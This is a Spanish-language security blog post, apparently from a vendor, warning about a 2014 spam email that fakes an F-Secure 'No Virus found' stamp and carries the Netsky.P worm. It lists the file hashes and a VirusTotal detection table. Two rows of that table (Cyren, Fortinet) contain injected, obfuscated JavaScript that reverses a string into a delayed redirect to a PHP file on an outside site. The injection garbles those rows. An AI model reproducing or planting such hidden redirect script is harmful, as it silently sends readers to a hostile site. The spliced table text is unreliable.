OTRO MAIL MASIVO, ESTA VEZ INDICANDO QUE HA SIDO REVISADO POR F-SECURE, resulta ser un antiguo NETSKY P, ya controlado
A través de un mail malicioso masivo (spam) se recibe este tipo de mail con el fichero anexado:
message_sat.exe,
con las siguientes caractericticas:
MAIL MALICIOSO:
_______________
Re: Delivery Server
“important stylesheet” href=”chrome://messagebody/skin/messageBody.css”>
Asunto: Delivery Server
Fecha: 20/10/2014
Para: <Destinatario>
First part of the secure mail is available.
++++ Attachment: No Virus found
++++ F-Secure AntiVirus – <a class=”moz-txt-link-abbreviated” href=”http://www.f-secure.com”>www.f-secure.com
______________________
FIN DEL MAIL MALICIOSO
A traves de nuestra utilidad ELINETSA ya controlamos dicho malware desde antaño !
El preanalisis de virustotal ofrece este informe:
MD5 3018e99857f31a59e0777396ae634a8f
SHA1 7031cfe76ee7b2c925f2c00372fb9ef7f983f60c
Tamaño del fichero 28.9 KB ( 29568 bytes )
SHA256: c8fffb2e737514c551b2d7bcaf8baa459564b059cab1a35a3cec4b3c270d4525
Nombre: photo.doc …
Detecciones: 51 / 54
Fecha de análisis: 2014-10-16 12:43:08 UTC
1 25
Antivirus Resultado Actualización
AVG I-Worm/Netsky 20141016
AVware Email-Worm.Win32.NetSky.q 20141016
Ad-Aware Win32.Generic.497472 20141016
Agnitum I-Worm.NetSky!4NWvXC1SwiU 20141015
AhnLab-V3 Win-Trojan/Fsg.29568 20141016
Antiy-AVL Worm[Email]/Win32.NetSky 20141016
Avast Win32:Netsky-AF [Wrm] 20141016
Avira Worm/Netsky.AP 20141016
Baidu-International Worm.Win32.NetSky.Asn 20141015
BitDefender Win32.Generic.497472 20141016
Bkav W32.SkyNetP.Worm 20141015
CAT-QuickHeal W32.NetSky.P 20141016
CMC Generic.Win32.3018e99857!MD 20141016
ClamAV Worm.NetSky-14 20141016
Comodo Worm.Win32.Netsky.Q 20141016
Cyren $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.P@mm”>W32/Netsky.P@mm 20141016
F-Secure Win32.Generic.497472 20141016
Fortinet $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.p@MM”>W32/Netsky.p@MM 20141016
McAfee-GW-Edition BehavesLike.Win32.Fujacks.mc 20141015
MicroWorld-eScan Win32.Generic.497472 20141016
Microsoft Worm:Win32/Netsky.P@mm 20141016
NANO-Antivirus Trojan.Win32.NetSky.idzx 20141016
Norman Netsky.P 20141016
Qihoo-360 Win32/Worm.d2e 20141016
Rising PE:Trojan.Win32.Generic.129CEE65!312274533 20141016
SUPERAntiSpyware Worm.Netsky-P 20141016
Sophos W32/Netsky-P 20141016
Symantec tos tres no lo controlan todavía:
AegisLab 20141016
ByteHero 20141016
Jiangmin 20141015
Dicha utilidad ELINETSA que lo detecta y elimina es la misma que ya está actualmente en nuestra web
saludos
ms, 20-10-2014
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.